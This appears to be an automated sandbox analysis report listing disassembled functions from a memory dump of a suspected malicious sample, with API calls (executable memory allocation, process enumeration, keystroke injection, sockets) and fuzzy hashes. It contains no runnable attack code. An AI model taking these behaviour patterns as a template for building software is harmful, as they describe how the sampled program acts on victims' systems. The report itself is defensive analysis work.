Instruction ID: b58041e328b954a39cd7e047ee3e6dc23bcc4092d1582a5fdffc6d8184cb3d3d
Opcode Fuzzy Hash: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
Instruction Fuzzy Hash: C8C17F75A00216EFCB18CF98C884EAEB7B5FF48714B158599E806EB351DB35ED81CB90

Function 00AFE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00AFE7A7
CharLowerBuffW.USER32(?,?), ref: 00AFE7EA

Part of subcall function 00AFDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00AFDEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AFE9EA
_memmove.LIBCMT ref: 00AFE9FD

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 5ce514fd5a55249f5b5d69a98f65f5b87eb10fd4642376466eb6421ee71817d4
Instruction ID: 560dab4a2a0ef22faa7ad1f1d576d9a9c7b776bf31411a65e1e552cb7b15cafb
Opcode Fuzzy Hash: 5ce514fd5a55249f5b5d69a98f65f5b87eb10fd4642376466eb6421ee71817d4
Instruction Fuzzy Hash: 4CC18971A083058FC714EF68C48096ABBE4FF89754F04896EF999DB361D731E946CB82

Function 00AF877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AF87AD
CoUninitialize.OLE32 ref: 00AF87B8

Part of subcall function 00B0DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00AF8A0E,?,00000000), ref: 00B0DF71

VariantInit.OLEAUT32(?), ref: 00AF87C3
VariantClear.OLEAUT32(?), ref: 00AF8A94

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 7c344b82c2e0d263ae2ff6f755dc10c1df2cd5e1bf5a62796ea281714cbfdfd5
Instruction ID: b447d682520c8902b4ba251550ce9fe271f241135e0c5061653f25815c88cd06
Opcode Fuzzy Hash: 7c344b82c2e0d263ae2ff6f755dc10c1df2cd5e1bf5a62796ea281714cbfdfd5
Instruction Fuzzy Hash: 53A17A35604B069FD710EFA4C581B2AB7E4FF88354F148849FA969B3A1DB74ED40CB92

Function 00AD814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8320
CLSIDFromProgID.OLE32(?,?,00000000,00B10988,000000FF,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8345
_memcmp.LIBCMT ref: 00AD8366

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
Instruction ID: 6b0518f31e1ddc3859ed9fc478a5d77bcce59d238950c93b428c900114ea35e2
Opcode Fuzzy Hash: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
Instruction Fuzzy Hash: 62814971A00109EFCB04DF94C988EEEB7B9FF89715F204599E516AB250DB71AE06CB60

Function 00AD749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AD74AC
SysAllocString.OLEAUT32(00000000), ref: 00AD7555
VariantCopy.OLEAUT32 ref: 00AD7584
VariantClear.OLEAUT32(?), ref: 00AD75AB

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 332fdf6a6bf39d2a25380f7c1169be910fd092aac7b8453edc3b298e1d3efa46
Instruction ID: 035094105b36f2580e33984877d08a3320340403b6ccd77296035489c43df623
Opcode Fuzzy Hash: 332fdf6a6bf39d2a25380f7c1169be910fd092aac7b8453edc3b298e1d3efa46
Instruction Fuzzy Hash: DE51C434608B029BDB28AF79D995A2DF7F5AF45310B20881FE547CB7A1FB70D8808B05

Function 00AFF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00AFF526
Process32FirstW.KERNEL32(00000000,?), ref: 00AFF534

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Process32NextW.KERNEL32(00000000,?), ref: 00AFF5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00AFF603

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
Instruction ID: 011c5e04d6bed97431507a40510b4bc04b3332d929de123d0ecc8d019009635f
Opcode Fuzzy Hash: 779009f7f03090f6bf797709ded167f75647dec5cd0344a6c19d28747ca40955
Instruction Fuzzy Hash: D3517DB1108315AFD710EF64D885EABB7E8EF98710F40492DF595D72A1EB70E904CB92

Function 00AA492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA49C0
__flush.LIBCMT ref: 00AA49E0
__write.LIBCMT ref: 00AA4A13
__flsbuf.LIBCMT ref: 00AA4A41

Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 4a47fb3dc1865ed6052fe873d806a37ab1972d76f38230d3dd327252adcfaeff
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: 844196356007069BDF288F69C9909AFBBA5AFCA3A0B24817DF455C76D0D7B09D508B44

Function 00ADA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ADA68A
__itow.LIBCMT ref: 00ADA6BB

Part of subcall function 00ADA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ADA976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ADA724
__itow.LIBCMT ref: 00ADA77B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
Instruction ID: 6080cd1a51a77141f773811419129b00a835be486a4442838adfa2c4d2fd6c0e
Opcode Fuzzy Hash: c9f46a88f3c6c3b3d1dda04dc284d010ead889c99a66df17a02dadd1a4d1c8cd
Instruction Fuzzy Hash: C4416E75A00309ABDF11EF54C956BEE7BB9EF54750F04006AF906A3391DB709A44CAA2

Function 00AF7095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00AF70BC
WSAGetLastError.WSOCK32(00000000), ref: 00AF70CC

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AF7130
WSAGetLastError.WSOCK32(00000000), ref: 00AF713C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
Instruction ID: c9e78a2e96474157aa257a85cd524055c6821c62aeba25f99af041643e5eebdf
Opcode Fuzzy Hash: 30d4bb683f21737946782f50192c9e0028974e1dcacab24514e3dbaf283f37a7
Instruction Fuzzy Hash: 9A41BF717442016FEB24BF64DD86F7E77E4AB08B14F048558FA199B3D2EBB09C008B91

Function 00AF6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B10980), ref: 00AF6B92
_strlen.LIBCMT ref: 00AF6BC4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 5eaf196c56d7e28f0db78d1182c9070c33e5d47e87116300b2779b58af905c05
Instruction ID: 9f7f0e57f539fd3fcd88f5711863c12c5b10ff2df7572545612a786800754964
Opcode Fuzzy Hash: 5eaf196c56d7e28f0db78d1182c9070c33e5d47e87116300b2779b58af905c05
Instruction Fuzzy Hash: 01419071A00109AFCB14FBA4DE96EBEB3B9EF58310F148155F95A9B292DF30AD41C790

Function 00B08E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B08F03

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
Instruction ID: cb1252776e8fd23b2b3dd8e2ff221cf79a50af50e1d9854f44ba9ed68a948b7f
Opcode Fuzzy Hash: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
Instruction Fuzzy Hash: 7631C33465411AEEEF209A24CC85BAC3FE6EB06320F544991FA91D71E1CFB0DB50CB91

Function 00B0B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B0B1D2
GetWindowRect.USER32(?,?), ref: 00B0B248
PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258
MessageBeep.USER32(00000000), ref: 00B0B2C9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
Instruction ID: 8f9e54fd1c236fc6cb2e6a132714f8d25c8cbc6d50825a4a39cce0d9f31ab7ab
Opcode Fuzzy Hash: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
Instruction Fuzzy Hash: E8414734A04219DFDB11DF99C884EAD7FF5FB4A350F1885E9E8189B2A5DB30A941CB90

Function 00AE12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AE1326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00AE1342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00AE13A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00AE13FA

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
Instruction ID: 3bcbc4e818bbf3c8dbdd15eee4f9128d505e4b381903c64e9495f7673674a46c
Opcode Fuzzy Hash: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
Instruction Fuzzy Hash: A3316E709402A9AEFF3187278C05BFEBBB6AB44310F04831AF4D05A6D5D3748D919B51

Function 00AE1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00AE1465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00AE1481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00AE14E0
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00AE1532

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
Instruction ID: df67a6f7632f9aa601fe28f795501dbc7da2bc49ec7c99405d3ca878ec3d1453
Opcode Fuzzy Hash: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
Instruction Fuzzy Hash: 10317BB09402A85EFF348B678C04BFEBBB6AB95310F48831AE491522D1C3788DC18B61

Function 00AB63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AB642B
__isleadbyte_l.LIBCMT ref: 00AB6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB64BD

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
Instruction ID: 62e76cb6dd5e82742e97081ef8294711c1275487791356a26e53cd869b1ea122
Opcode Fuzzy Hash: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
Instruction Fuzzy Hash: 5031D031600A56AFDB218F65CE44BEB7FA9FF41320F154429F82487192DB39E890DB50

Function 00B0552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B0553F

Part of subcall function 00AE3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AE3B4E
Part of subcall function 00AE3B34: GetCurrentThreadId.KERNEL32 ref: 00AE3B55
Part of subcall function 00AE3B34: AttachThreadInput.USER32(00000000,?,00AE55C0), ref: 00AE3B5C

GetCaretPos.USER32(?), ref: 00B05550
ClientToScreen.USER32(00000000,?), ref: 00B0558B
GetForegroundWindow.USER32 ref: 00B05591

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d2f73765d434ad58b21af471fff4c2ffe371635d3600ab939dcb5ef61c800b71
Instruction ID: 547d2c92f03cf5fd209cfb0438719ef9ce8690fa5e3202a2b3105c044771fe25
Opcode Fuzzy Hash: d2f73765d434ad58b21af471fff4c2ffe371635d3600ab939dcb5ef61c800b71
Instruction Fuzzy Hash: C4313C72900109AFDB10EFB5CD859EFB7F9EF98304F10406AE515E7241EA75AE408BA0

Function 00B0CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

GetCursorPos.USER32(?), ref: 00B0CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ABBCEC,?,?,?,?,?), ref: 00B0CB8F
GetCursorPos.USER32(?), ref: 00B0CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ABBCEC,?,?,?), ref: 00B0CC16

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d4aba9fda0628d54320ffd80144eac5e1ca1404e4d306df11ccf1d542c6b2570
Instruction ID: 76e8286ce5c8e0554b405d2d7a08e8f64cda754ed7ee127269401dda1d946d52
Opcode Fuzzy Hash: d4aba9fda0628d54320ffd80144eac5e1ca1404e4d306df11ccf1d542c6b2570
Instruction Fuzzy Hash: E6318D35600018AFCB259F59C899EFA7FF6EB49310F444199F9059B2B1CB319D51EFA0

Function 00AA0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00AA0BE2

Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065

_fprintf.LIBCMT ref: 00AA0C19
OutputDebugStringW.KERNEL32(?), ref: 00AD694C

Part of subcall function 00AA4CCA: _flsall.LIBCMT ref: 00AA4CE3

__setmode.LIBCMT ref: 00AA0C4E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 24135a3c292c16f84bfa9ac03fbc3b397eb2307750ea320042ac5d76e38a86c4
Instruction ID: 8c0203405aef3ba7ebedaff02d4155e9a5c3c6c3de1495bdf8f82b51a4cceebd
Opcode Fuzzy Hash: 24135a3c292c16f84bfa9ac03fbc3b397eb2307750ea320042ac5d76e38a86c4
Instruction Fuzzy Hash: 31110631A041046EDB08BBA4AE46DBE7B6DEF8A321F14015AF204972C2EFA55D5287A1

